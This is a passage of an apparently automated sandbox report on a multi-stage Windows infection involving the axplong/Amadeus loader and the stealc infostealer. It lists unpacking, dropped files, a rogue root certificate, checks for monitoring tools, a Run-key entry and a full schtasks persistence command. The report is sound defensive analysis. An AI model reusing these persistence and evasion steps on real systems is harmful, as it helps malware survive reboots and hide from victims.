Source:	Binary string: nss3.pdb source: stealc_default2.exe, 00000014.00000002.3059535907.000000006C3FF000.00000002.00000001.01000000.00000019.sdmp
Source:	Binary string: mozglue.pdb source: stealc_default2.exe, 00000014.00000002.3059192881.000000006C23D000.00000002.00000001.01000000.0000001A.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: caesium-image-compressor.exe, 00000015.00000002.2975464614.0000000001A80000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 0000002C.00000003.3228961940.0000000002A9D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: G.pdb source: axplong.exe, 00000006.00000002.3380519963.0000000000C59000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Unpacked PE file: 0.2.OmnqazpM3P.exe.7b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ogvicfhk:EW;behzrsjn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ogvicfhk:EW;behzrsjn:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 2.2.axplong.exe.170000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ogvicfhk:EW;behzrsjn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ogvicfhk:EW;behzrsjn:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 3.2.axplong.exe.170000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ogvicfhk:EW;behzrsjn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ogvicfhk:EW;behzrsjn:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 6.2.axplong.exe.170000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ogvicfhk:EW;behzrsjn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ogvicfhk:EW;behzrsjn:EW;.taggant:EW;

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe

Unpacked PE file: 23.2.BitcoinCore.exe.3810000.2.unpack

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: Nework[1].exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x6abc6
Source: OmnqazpM3P.exe	Static PE information: real checksum: 0x1d3d84 should be: 0x1dfc83
Source: Amadeus.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x6b364
Source: axplong.exe.0.dr	Static PE information: real checksum: 0x1d3d84 should be: 0x1dfc83
Source: stealc_default2.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x31181
Source: crypteda[1].exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x11b6f1
Source: Nework.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x6abc6
Source: stealc_default2[1].exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x31181
Source: crypteda.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x11b6f1
Source: Amadeus[1].exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x6b364

Source: OmnqazpM3P.exe	Static PE information: section name:
Source: OmnqazpM3P.exe	Static PE information: section name: .idata
Source: OmnqazpM3P.exe	Static PE information: section name:
Source: OmnqazpM3P.exe	Static PE information: section name: ogvicfhk
Source: OmnqazpM3P.exe	Static PE information: section name: behzrsjn
Source: OmnqazpM3P.exe	Static PE information: section name: .taggant
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: .idata
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: ogvicfhk
Source: axplong.exe.0.dr	Static PE information: section name: behzrsjn
Source: axplong.exe.0.dr	Static PE information: section name: .taggant
Source: caesium-image-compressor[1].exe.6.dr	Static PE information: section name: .symtab
Source: caesium-image-compressor.exe.6.dr	Static PE information: section name: .symtab
Source: BitcoinCore[1].exe.6.dr	Static PE information: section name: .didata
Source: BitcoinCore.exe.6.dr	Static PE information: section name: .didata
Source: PureSyncInst[1].exe.6.dr	Static PE information: section name: .symtab
Source: PureSyncInst.exe.6.dr	Static PE information: section name: .symtab

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_1_001DF753 push ebp; mov dword ptr [esp], 0121FFD2h	3_1_001DF769
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_1_002A522B push 3663E1EAh; mov dword ptr [esp], eax	3_1_002A5277
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_1_002A522B push 6F8A142Fh; mov dword ptr [esp], ecx	3_1_002A52EA
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_1_002A522B push 1CF47E87h; mov dword ptr [esp], edx	3_1_002A5332
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_1_00234E33 push edi; mov dword ptr [esp], 7FF76F29h	3_1_00234E4F
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_1_00234E33 push 28300BCFh; mov dword ptr [esp], ebx	3_1_00234E9A
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_1_00234E33 push ebx; mov dword ptr [esp], 27654C9Fh	3_1_00234F1A
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_1_001DCC38 push edx; mov dword ptr [esp], esi	3_1_001DCCE3
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_1_00267A60 push esi; mov dword ptr [esp], edi	3_1_00267AF4
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_1_00267A60 push 6B06FBB1h; mov dword ptr [esp], esi	3_1_00267B05
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_1_00267A60 push eax; mov dword ptr [esp], edi	3_1_00267B1D
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_1_00267A60 push ebx; mov dword ptr [esp], ebp	3_1_00267B3A
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_1_001DCE50 push 31EC64ADh; mov dword ptr [esp], esp	3_1_001DD236
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_1_001DD452 push ecx; mov dword ptr [esp], eax	3_1_001DD761
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_1_001DD475 push esi; iretd	3_1_001DD476
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_1_00211E49 push edx; mov dword ptr [esp], 4FF68E32h	3_1_00211E6F
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_1_00211E49 push ebp; mov dword ptr [esp], eax	3_1_00211E7F
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_1_00211E49 push edx; mov dword ptr [esp], ebp	3_1_00211E97
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_1_00211E49 push ebp; mov dword ptr [esp], edi	3_1_00211F89
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_1_001DD073 push 31EC64ADh; mov dword ptr [esp], esp	3_1_001DD236
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_1_00243E4A push ecx; mov dword ptr [esp], esi	3_1_00243E6E
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_1_00243E4A push ecx; mov dword ptr [esp], 473B12AAh	3_1_00243EBF
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_1_00243E4A push esi; mov dword ptr [esp], 257FD351h	3_1_00243F2C
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_1_00243E4A push esi; mov dword ptr [esp], edx	3_1_00243F57
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_1_001DCEBE push ebp; mov dword ptr [esp], edi	3_1_001DCDFB
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_1_001DCECA push edi; mov dword ptr [esp], 3D4B3662h	3_1_001DCF7C
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_1_001DCECA push 7C01E605h; mov dword ptr [esp], ecx	3_1_001DD3D9
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_1_002642F8 push ebp; mov dword ptr [esp], ebx	3_1_0026437E
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_1_002642F8 push ebp; mov dword ptr [esp], 7F5E4004h	3_1_00264382
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_1_002642F8 push edx; mov dword ptr [esp], 76839E38h	3_1_002643A4
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_1_002642F8 push 2D1C02D1h; mov dword ptr [esp], esi	3_1_0026449D

Source: OmnqazpM3P.exe	Static PE information: section name: entropy: 7.983930820608206
Source: OmnqazpM3P.exe	Static PE information: section name: ogvicfhk entropy: 7.953631233821215
Source: axplong.exe.0.dr	Static PE information: section name: entropy: 7.983930820608206
Source: axplong.exe.0.dr	Static PE information: section name: ogvicfhk entropy: 7.953631233821215
Source: crypted[1].exe.6.dr	Static PE information: section name: .text entropy: 7.995145897290141
Source: crypted.exe.6.dr	Static PE information: section name: .text entropy: 7.995145897290141
Source: crypteda[1].exe.6.dr	Static PE information: section name: .text entropy: 7.99930616062516
Source: crypteda.exe.6.dr	Static PE information: section name: .text entropy: 7.99930616062516

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr			Jump to dropped file

Installs new ROOT certificates

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Amadeus[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\1000238002\Amadeus.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\crypteda[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\caesium-image-compressor[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\runtime[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000262001\385107.exe	File created: C:\Users\user\AppData\Local\Temp\7zSC5C3.tmp\Install.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000228001\PureSyncInst.exe	Jump to dropped file
Source: C:\Users\user\1000238002\Amadeus.exe	File created: C:\Users\user\AppData\Local\Temp\1000262001\385107.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7zSC5C3.tmp\Install.exe	File created: C:\Users\user\AppData\Local\Temp\7zSD38E.tmp\Install.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\stealc_default2[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\BitcoinCore[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\PureSyncInst[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	File created: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\crypted[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000129001\caesium-image-compressor.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Nework[1].exe	Jump to dropped file
Source: C:\Users\user\1000238002\Amadeus.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\setup[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url

Source: C:\Users\user\Desktop\OmnqazpM3P.exe

File created: C:\Windows\Tasks\axplong.job

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Amadeus.exe			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Amadeus.exe			Jump to behavior

Source: C:\Users\user\Desktop\OmnqazpM3P.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
